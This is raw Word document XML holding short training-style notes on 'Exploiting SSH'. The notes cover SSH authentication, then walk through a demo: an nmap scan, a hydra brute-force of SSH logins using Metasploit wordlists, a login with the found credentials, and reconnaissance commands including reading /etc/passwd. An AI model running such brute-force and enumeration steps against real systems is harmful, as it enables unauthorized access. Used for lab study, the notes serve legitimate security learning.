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918FF" w14:textId="10538F7E" w:rsidR="00853ABF" w:rsidRPr="00B53DEE" w:rsidRDefault="008F2DFE" w:rsidP="00B53DEE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B53DEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5912945E" w14:textId="7A147478" w:rsidR="008F2DFE" w:rsidRDefault="008F2DFE" w:rsidP="00B53DEE">
      <w:r>
        <w:t xml:space="preserve">Secure shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E02CB34" w14:textId="1E50CEE5" w:rsidR="008F2DFE" w:rsidRDefault="008F2DFE" w:rsidP="00B53DEE">
      <w:r>
        <w:t>Upgradation of telnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7D2DBF" w14:textId="38676036" w:rsidR="008F2DFE" w:rsidRDefault="00B53DEE" w:rsidP="00B53DEE">
      <w:r>
        <w:t xml:space="preserve">Ssh=22 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EF652E" w14:textId="77777777" w:rsidR="00B53DEE" w:rsidRDefault="00B53DEE" w:rsidP="00B53DEE"/>
    <w:p w14:paraId="608ACB95" w14:textId="760D7192" w:rsidR="00B53DEE" w:rsidRPr="00B53DEE" w:rsidRDefault="00B53DEE" w:rsidP="00B53DEE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B53DEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ssh authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7D5A3" w14:textId="6213048B" w:rsidR="00B53DEE" w:rsidRDefault="00B53DEE" w:rsidP="00B53DEE">
      <w:r>
        <w:t>User and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2868F2" w14:textId="79F24DFB" w:rsidR="00B53DEE" w:rsidRDefault="00B53DEE">
      <w:r>
        <w:t>Key based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E96B9D5" w14:textId="3761C111" w:rsidR="00B53DEE" w:rsidRDefault="00EF179D">
      <w:r>
        <w:t>Most of the time the authentication is user and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7333D68D" w14:textId="77777777" w:rsidR="00EF179D" w:rsidRDefault="00EF179D"/>
    <w:p w14:paraId="5BD0E71C" w14:textId="483209D9" w:rsidR="00EF179D" w:rsidRPr="00EF179D" w:rsidRDefault="00EF179D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF179D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bruteforce on ssh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0B401A" w14:textId="2C7D3C15" w:rsidR="00EF179D" w:rsidRDefault="00EF179D">
      <w:r>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C2493" w14:textId="671E951B" w:rsidR="00EF179D" w:rsidRDefault="00EF179D">
      <w:r>
        <w:t>Ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390D0798" w14:textId="43E91953" w:rsidR="009233F6" w:rsidRDefault="00EF179D">
      <w:r>
        <w:t>Nmap -s V target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C58826" w14:textId="26AA47B6" w:rsidR="00EF179D" w:rsidRDefault="00DA2383">
      <w:r>
        <w:t xml:space="preserve">Hydra -L /usr/share/Metasploit-framework/data/wordlists/common_user.txt -P  </w:t>
      </w:r>
      <w:r>
        <w:t>/usr/share/Metasploit-framework/data/wordlists/common_</w:t>
      </w:r>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> target_ip</w:t>
      </w:r>
      <w:r w:rsidR="009233F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009233F6">
        <w:t>-t 4</w:t>
      </w:r>
      <w:r w:rsidR="009233F6">
        <w:t xml:space="preserve"> ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755C6EA0" w14:textId="77777777" w:rsidR="009233F6" w:rsidRDefault="009233F6"/>
    <w:p w14:paraId="68922217" w14:textId="73E26255" w:rsidR="009233F6" w:rsidRDefault="006025DB">
      <w:r>
        <w:t>Ssh account_name@target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6EC1F7" w14:textId="0B27EDA4" w:rsidR="006025DB" w:rsidRDefault="006025DB">
      <w:r>
        <w:t>Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A865550" w14:textId="77777777" w:rsidR="006025DB" w:rsidRDefault="006025DB"/>
    <w:p w14:paraId="1008642A" w14:textId="0E712CFD" w:rsidR="006025DB" w:rsidRDefault="006025DB">
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB65383" w14:textId="362E2F8B" w:rsidR="006025DB" w:rsidRDefault="006025DB">
      <w:r>
        <w:t xml:space="preserve">Groups </w:t>
      </w:r>
      <w:r>
        <w:t>account_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> # part of which group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439C509D" w14:textId="77777777" w:rsidR="006025DB" w:rsidRDefault="006025DB">
      <w:r>
        <w:t xml:space="preserve">Cat /etc/*issue  #distribution release version </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A554798" w14:textId="77777777" w:rsidR="006025DB" w:rsidRDefault="006025DB">
      <w:r>
        <w:t>Uname -r # kernel version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AABCBE" w14:textId="1A3F9620" w:rsidR="00DC7FB5" w:rsidRDefault="000C7F65">
      <w:r>
        <w:t>Cat /etc/passwd #users on the syste</w:t>
      </w:r>
      <w:r w:rsidR="00DC7FB5">
        <w:t>m</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DC7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B7C37"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D4A7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360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572"/>
    <w:rsid w:val="000C7F65"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006025DB"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008F2DFE"/>
    <w:rsid w:val="009233F6"/>
    <w:rsid w:val="00986B02"/>
    <w:rsid w:val="00B53DEE"/>
    <w:rsid w:val="00DA2383"/>
    <w:rsid w:val="00DC7FB5"/>
    <w:rsid w:val="00EF179D"/>
    <w:rsid w:val="00F03572"/>
    <w:rsid w:val="00F5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9986C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0D310AE7-1292-4FF2-8027-7BD72D10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27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-19T05:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-19T06:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>